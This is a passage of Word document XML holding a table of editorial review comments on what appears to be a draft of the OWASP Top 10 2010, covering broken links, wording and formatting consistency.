        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>From Colin Watson:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9480" w:type="dxa"/>
        <w:tblInd w:w="96" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="642"/>
        <w:gridCol w:w="1260"/>
        <w:gridCol w:w="90"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="6048"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="264"/>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b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="135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b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6048"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b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="1056"/>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E1</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Introduction: Warnings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Consistency</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Where to go from here' is currently in sentence case and underlined.  In the Release Notes, 'Understanding Application Security Risk' is in double quotes.  Use double quotes and Title case for all references to other sections?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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E2</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Risk: What's My Risk</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Consistency</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 xml:space="preserve">The 'OWASP Top 10' links to the alias /top_10 rather than the one quoted in the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Foreward</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>: /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Topten</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="1056"/>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E3</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A1: How Do I Prevent Injection</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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Futureproofing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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 xml:space="preserve">There are two links to the Google Code.  Could </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>these link</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> to an OWASP address (an alias) that redirects to the Google site instead?  Then </w:t>
            </w:r>
            <w:r w:rsidR="00C45ADB">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>if a generic language-independe</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nt page is created in the future, the redirect can be altered?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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E4</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A1: References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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Futureproofing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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Two Google Code links as E3 above.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="1584"/>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E5</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A2: References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Mistake?</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The second last OWASP link to the Testing Guide links to a v2 document.  There are maybe three v3 links:</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>http://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>http://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002)</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>http://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OWASP-DV-003)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="1320"/>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E6</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A2: References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Mistake</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The last OWASP link to the Code Review Guide Chapter on XSS Review is linking to the Testing Guide instead.  I think the link should be:</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>http://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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E7</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A3: How Do I Prevent This?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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Futureproofing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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One Google Code link as E3 above.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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E8</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A3: How Do I Prevent This?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Mistake?</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Should item 3 refer to A2 (XSS) instead of A5 (CSRF)?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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lastRenderedPageBreak/>
              <w:t>E9</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A3: References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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Futureproofing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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Two Google Code links as E3 above.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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E10</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A4: References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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Futureproofing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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Two Google Code links as E3 above.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="792"/>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E11</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A4: References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Mistake</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The two ESAPI Google Code links are very similar, but one is currently a dead link - check what URLs these are meant to be.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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E12</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A5: References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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Futureproofing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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One Google Code link as E3 above.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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E13</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A7: References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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Futureproofing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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One Google Code link as E3 above.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="792"/>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E14</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A8: Header</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Mistake</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 xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>coloured</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> risk box "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Detectability</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> EASY" should be red not yellow. (I think this was mentioned by someone on the Leaders list).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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E15</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A8: Example Attack Scenarios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Mistake</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 xml:space="preserve">Remove the active hyperlinks from the two examples.  </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>These link</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> to a real website.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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E16</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A8: How Do I Prevent This?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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Futureproofing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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One Google Code link as E3 above.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="1056"/>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E17</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A8: References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Mistake</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The WASC link is incorrectly going to the MITRE site.  Link possibly should be:</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>http://projects.webappsec.org/URL-Redirector-Abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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E18</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A8: References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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Futureproofing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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One Google Code link as E3 above.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="792"/>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E19</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A9: Header</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Terminology</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In the Technical Impact box, perhaps substitute PII (which has a specific legal meaning in US) with "personal or other sensitive information"?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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E20</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A9: Am I Vulnerable?</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Terminology</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Consider PII change as E19 above.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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E21</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A9: References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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Futureproofing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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One Google Code link as E3 above.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="1056"/>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E22</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A9: References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Mistake</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CWE 310 is incorrectly linking to 312.  Link should be:</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>http://cwe.mitre.org/data/definitions/310.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="792"/>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E23</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A10: How Do I Prevent This?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Terminology</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In item 3, FIPS 140-2 is just one example from a non-exhaustive list… so add "e.g." like (e.g. FIPS 140-2 compliant)"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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E24</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What’s Next for Developers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Mistake</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w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>free</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> and open" is not a hyperlink so should not be blue (see also E30 below).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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E25</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What’s Next for Developers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Mistake</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Apart from the contract annex and projects links, none of the other 13 hyperlinks on this page work.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="52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lastRenderedPageBreak/>
              <w:t>E26</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What’s Next for Verifiers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Mistake</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8 hyperlinks not working.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="1056"/>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E27</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What’s Next for Verifiers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Extra</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Does "O2" need a link to:</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>http://www.owasp.org/index.php/OWASP_O2_Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="1056"/>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E28</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Notes about Risk</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Extra</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Is it worth mentioning/linking to the WASC Threat Classification?</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>http://www.webappsec.org/projects/threat/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="792"/>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E29</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Notes about Risk</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Layout</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 xml:space="preserve">Could the shaded table area continue below the lower calculation (i.e. below the 2.6), or remove it completely from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>behing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> the number calculations?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="792"/>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E30</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Various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Style</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 xml:space="preserve">Could word emphasis use emboldening rather than underlining, reserving the latter for hyperlinks?  </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Not too big of an issue since hyperlinks are a different </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>colour</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (good), but in B&amp;W prints you can't tell the difference.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="3432"/>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E31</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Various</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Consistency</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The document is referred to as "Top 10" rather than "Top Ten".  I prefer the latter because:</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>a) The numeric "10" clashes a bit with "2010" which will be the release year, making it harder to read/comprehend in speech</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>b) The name of the project is "OWASP Top Ten"</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
